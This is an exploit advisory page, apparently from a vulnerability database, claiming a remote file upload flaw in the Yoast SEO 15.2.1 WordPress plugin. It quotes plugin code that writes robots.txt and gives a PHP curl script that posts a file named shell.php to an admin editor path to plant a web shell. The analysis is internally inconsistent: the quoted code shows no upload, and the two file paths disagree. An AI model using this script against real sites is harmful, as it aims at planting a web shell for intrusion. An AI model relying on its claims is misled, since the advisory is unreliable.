Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload

2020.11.11
ir OmideMehraban (IR) ir
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

* Exploit Title: Wordpress Plugin Yoast SEO 15.2.1 - Remote File Upload * Google Dork: N/A * Date: 2020.11.10 * Exploit Author: OmideMehraban * Vendor Homepage: https://wordpress.org/plugins/wordpress-seo * Software Link: https://wordpress.org/plugins/wordpress-seo * Category : webapps * Version: 15.2.1 * Tested on: windows 10 , firefox * CVE : N/A Vulnerable Source: 61: fwrite fwrite($f, $robotsnew); 60: $f = fopen($robots_file, 'w+'); 21: $robots_file = $home_path . 'robots.txt'; 18: $home_path = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR; // if(!is_writable($home_path) && !empty($_SERVER)), 15: $home_path = get_home_path(); 58: $robotsnew = sanitize_textarea_field(wp_unslash($_POST['robotsnew'])); requires: 45: if(isset($_POST['submitrobots'])) 57: if(isset($_POST['robotsnew']) && file_exists($robots_file)) 59: if(is_writable($robots_file)) Exploit: <?php $Omid="shell.php"; $ch = curl_init("http://localhost/wordpress/wp-content/admin/views/tool-file-editor.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$Omid")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/admin/views/tool-file-editor.php/Shell.php;.jpg ********************************************************* * Discovered By OmideMehraban * Instagram: @omidemehraban * Telegram: @omiid *********************************************************


See this note in RAW Version
Vote for this issue:
5%
95%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top